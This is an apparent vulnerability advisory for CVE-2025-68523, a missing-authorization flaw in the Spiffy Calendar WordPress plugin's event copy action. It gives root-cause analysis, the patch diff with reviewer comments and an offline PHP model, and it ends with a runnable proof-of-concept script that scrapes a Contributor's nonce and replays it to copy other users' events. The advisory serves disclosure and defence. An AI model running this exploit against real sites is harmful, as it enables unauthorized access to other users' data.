Atomic Edge analysis of CVE-2025-68523:
The Spiffy Calendar WordPress plugin contains a missing authorization vulnerability in its event copy functionality. The flaw allows authenticated attackers with Contributor-level permissions or higher to copy calendar events they are not permitted to edit. It affects all plugin versions up to and including 5.0.7 and is fixed in 5.0.8; the CVSS score of 4.3 indicates medium severity.
The root cause is a nonce that is not bound to the event being copied. The Copy row action in spiffy-calendar/includes/admin/custom-posts.php (line 379) builds its link with wp_nonce_url() using basename(__FILE__) alone as the nonce action. A WordPress nonce is per-user and time-limited, but it is only as specific as its action string: because the action is identical for every event, a nonce minted for one event's Copy link verifies for any other post ID. The copy_event() handler at line 397 calls check_admin_referer() with that same action and then loads the post named in $_GET['post']; it never checks whether the current user may edit the target event (for example with current_user_can('edit_post', $post_id)) before copying it.
Exploitation requires an authenticated account with at least Contributor-level access. The attacker first loads the events list while logged in and takes the _wpnonce value from the Copy link of any event they are shown, such as one of their own. They then send a GET request to /wp-admin/admin.php with page=spiffy-calendar, action=copy, post=<target event ID> and that _wpnonce value. Because the nonce was generated for the action basename(__FILE__), which carries no post ID, check_admin_referer() accepts it for any value of post, so the attacker can copy any event by changing only the post parameter while reusing the same nonce.
The patch makes two changes to custom-posts.php. First, the nonce action used when building the Copy link at line 379 becomes basename(__FILE__).$post->ID. Second, the verification in the handler becomes check_admin_referer(basename(__FILE__).$post_id), with $post_id read from $_GET['post'] through absint() before the check (the original assignment further down is left in place, so the ID is now read twice). A nonce is therefore valid only for the event it was issued for, which stops cross-ID reuse. Note that the patch does not add a capability check: if a Copy link for an event the user cannot edit is ever rendered to them, the ID-bound nonce alone still lets them copy it.
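To make the nonce-scoping point concrete, here is an added, self-contained PHP model (not code from the Spiffy Calendar plugin or from Atomic Edge) of how a WordPress action-scoped nonce behaves under the pre-5.0.8 action string, under the 5.0.8 per-ID action string, and with the capability check the patch omits. create_nonce() and verify_nonce() are simplified stand-ins for wp_create_nonce() and wp_verify_nonce(), user_can_edit() stands in for current_user_can('edit_post', ...), and the secret, user IDs and event table are constructed test data.

```php
<?php
// Added example, not code from the Spiffy Calendar plugin or from Atomic Edge.
// Models WordPress action-scoped nonces and three versions of a copy handler
// so the nonce-reuse problem and the fix can be run offline.
// All secrets, users and events below are constructed test data.

const NONCE_KEY  = 'constructed-secret-key';  // stand-in for the wp-config salts
const NONCE_LIFE = 12 * 60 * 60;              // one nonce tick (WP uses 12h ticks)

function nonce_tick(): int {
    return (int) ceil(time() / NONCE_LIFE);
}

// Modelled on wp_create_nonce(): the token binds the tick, the action string
// and the user. It is per-user and time-limited, but NOT per-object unless
// the action string itself carries the object ID.
function create_nonce(string $action, int $user_id): string {
    $mac = hash_hmac('md5', nonce_tick() . '|' . $action . '|' . $user_id, NONCE_KEY);
    return substr($mac, -12, 10);
}

// Modelled on wp_verify_nonce() (the real one also accepts the previous tick).
function verify_nonce(string $nonce, string $action, int $user_id): bool {
    return hash_equals(create_nonce($action, $user_id), $nonce);
}

// Constructed event table: key = post ID, author = owning user ID.
function sample_events(): array {
    return [
        5 => ['author' => 2, 'title' => 'Contributor draft'],
        9 => ['author' => 1, 'title' => 'Admin-owned event'],
    ];
}

// Stand-in for current_user_can('edit_post', $post_id) as it applies to a
// Contributor: they may only act on their own events.
function user_can_edit(array $events, int $user_id, int $post_id): bool {
    return isset($events[$post_id]) && $events[$post_id]['author'] === $user_id;
}

function do_copy(array &$events, int $post_id): string {
    $new_id = max(array_keys($events)) + 1;
    $events[$new_id] = $events[$post_id] + ['copied_from' => $post_id];
    return "copied $post_id to $new_id";
}

// <= 5.0.7 behaviour: the action is the bare file name, shared by every event.
function copy_event_vulnerable(array &$events, int $user_id, array $get): string {
    $post_id = (int) ($get['post'] ?? 0);
    if (!isset($events[$post_id])) return 'bad copy request';
    if (!verify_nonce($get['_wpnonce'] ?? '', 'custom-posts.php', $user_id)) return 'nonce failure';
    return do_copy($events, $post_id);
}

// 5.0.8 behaviour: the action carries the post ID, so a nonce minted for one
// event's Copy link no longer verifies for a different post ID.
function copy_event_patched(array &$events, int $user_id, array $get): string {
    $post_id = (int) ($get['post'] ?? 0);
    if (!isset($events[$post_id])) return 'bad copy request';
    if (!verify_nonce($get['_wpnonce'] ?? '', 'custom-posts.php' . $post_id, $user_id)) return 'nonce failure';
    return do_copy($events, $post_id);
}

// What a missing-authorization fix should also include: a capability check.
// A nonce proves intent (anti-CSRF); it is not an authorization decision.
function copy_event_hardened(array &$events, int $user_id, array $get): string {
    $post_id = (int) ($get['post'] ?? 0);
    if (!isset($events[$post_id])) return 'bad copy request';
    if (!verify_nonce($get['_wpnonce'] ?? '', 'custom-posts.php' . $post_id, $user_id)) return 'nonce failure';
    if (!user_can_edit($events, $user_id, $post_id)) return 'insufficient permissions';
    return do_copy($events, $post_id);
}

$contributor = 2;

// The Contributor takes the nonce from the Copy link of their own event (ID 5)
// and replays it against the admin-owned event (ID 9).
$e = sample_events();
$reused = create_nonce('custom-posts.php', $contributor);
echo 'vulnerable, reused nonce:  ', copy_event_vulnerable($e, $contributor, ['post' => 9, '_wpnonce' => $reused]), "\n";

$e = sample_events();
$bound = create_nonce('custom-posts.php5', $contributor);
echo 'patched, reused nonce:     ', copy_event_patched($e, $contributor, ['post' => 9, '_wpnonce' => $bound]), "\n";

// If a Copy link for event 9 is ever rendered to the Contributor, the ID-bound
// nonce alone does not help; only the capability check refuses the copy.
$e = sample_events();
$leaked = create_nonce('custom-posts.php9', $contributor);
echo 'patched, leaked link:      ', copy_event_patched($e, $contributor, ['post' => 9, '_wpnonce' => $leaked]), "\n";
echo 'hardened, leaked link:     ', copy_event_hardened($e, $contributor, ['post' => 9, '_wpnonce' => $leaked]), "\n";
```

Run it with `php nonce-model.php`. The first call shows the Contributor's nonce from their own event being accepted for the admin-owned event, the second shows the per-ID action rejecting that replay, and the last two show that once a per-ID nonce for event 9 reaches the Contributor only the capability check stops the copy. The design point is that binding the nonce to the ID narrows the CSRF token; deciding whether this user may copy this event is a separate check that belongs in the handler regardless of how the nonce is scoped.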
Successful exploitation allows an attacker to duplicate any calendar event, including events owned by other users, bypassing the intended restriction that users only copy events they are allowed to edit. This results in unauthorized duplication of event data and, depending on which fields the copy routine carries across, can expose event content or metadata the attacker could not otherwise read or modify. Although the vulnerability requires Contributor-level access, the copy action is one that the plugin's own authorization model does not grant such users for other people's events.
--- a/spiffy-calendar/includes/admin/custom-posts.php
+++ b/spiffy-calendar/includes/admin/custom-posts.php
@@ -379,7 +379,7 @@
),
'admin.php'
),
- basename(__FILE__),
+ basename(__FILE__).$post->ID,
);
$actions[ 'copy' ] = '<a href="' . esc_url( $url ) . '" title="' . __('Copy','spiffy-calendar') . '">' . __('Copy','spiffy-calendar') . '</a>';
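Review bot: appending $post->ID to the nonce action binds the Copy link to one event, but this hunk still renders the link and mints the per-ID nonce without any capability check, so any user who is shown the row gets a nonce that will verify for it. Suggest only emitting `$actions[ 'copy' ]` when `current_user_can( 'edit_post', $post->ID )` holds, and confirm that `$post` here is the WP_Post handed to the row-actions callback, since the handler side keys the action off `$_GET[ 'post' ]` and the two values must agree for the nonce to verify.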
@@ -397,10 +397,13 @@
wp_die( __('Bad copy request', 'spiffy-calendar') );
}
+ // Get the original post ID
+ $post_id = absint( $_GET[ 'post' ] );
+
// Nonce verification
- check_admin_referer( basename( __FILE__ ) );
+ check_admin_referer( basename( __FILE__ ).$post_id );
- // Get the original post ID and data
+ // Get the original post data
$post_id = absint( $_GET[ 'post' ] );
$post = get_post( $post_id );
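Review bot: `$post_id = absint( $_GET[ 'post' ] );` now appears twice, once before check_admin_referer() and again after it; drop the second assignment. More importantly, the handler still performs no authorization: once the nonce passes it goes straight to get_post(). Add `if ( ! current_user_can( 'edit_post', $post_id ) ) { wp_die( ... ); }` before the copy proceeds, and reject `$post_id === 0` before the nonce check so a missing or non-numeric `post` parameter does not produce the action string `custom-posts.php0`.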
--- a/spiffy-calendar/spiffy-calendar.php
+++ b/spiffy-calendar/spiffy-calendar.php
@@ -3,7 +3,7 @@
Plugin Name: Spiffy Calendar
Plugin URI: http://www.spiffyplugins.ca/spiffycalendar
Description: A full featured, simple to use Spiffy Calendar plugin for WordPress that allows you to manage and display your events and appointments.
-Version: 5.0.7
+Version: 5.0.8
Author: Spiffy Plugins
Author URI: http://spiffyplugins.ca
License: GPL2
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68523 - Spiffy Calendar <= 5.0.7 - Missing Authorization
$target_url = 'https://example.com/wp-admin/admin.php';
$cookie = 'wordpress_logged_in_123=...'; // session cookie of a Contributor-level account
// Configuration
$post_id = 123; // Target event ID to copy (an event the Contributor cannot edit)
// Step 1: Get a valid nonce from any Copy link on the events list page.
// The nonce is minted for the action basename(__FILE__) ('custom-posts.php'),
// which is the same for every event, so the nonce from the attacker's own
// event's Copy link verifies for any other post ID.
$list_url = $target_url . '?page=spiffy-calendar';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $list_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
$response = curl_exec($ch);
if ($response === false) {
    die('Failed to fetch events list: ' . curl_error($ch) . "\n");
}
// Extract the nonce from a Copy link. esc_url() encodes '&' as '&#038;', so
// match only on the parameter name; WordPress nonces are 10 hex characters
// and wp_nonce_url() appends _wpnonce after the action/post parameters.
if (!preg_match('/action=copy[^"]*_wpnonce=([0-9a-f]{10})/', $response, $m)) {
    die("No Copy link with a nonce found on the events list page\n");
}
$nonce = $m[1];
// Step 2: Replay that nonce against a different post ID
$copy_url = $target_url . '?page=spiffy-calendar&action=copy&post=' . $post_id . '&_wpnonce=' . $nonce;
curl_setopt($ch, CURLOPT_URL, $copy_url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$copy_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
// 'Event copied' is the success text this PoC looks for in the redirected page
if ($http_code == 200 && strpos($copy_response, 'Event copied') !== false) {
    echo "Successfully copied event ID: $post_id\n";
} else {
    echo "Copy failed. HTTP code: $http_code\n";
}
curl_close($ch);
?>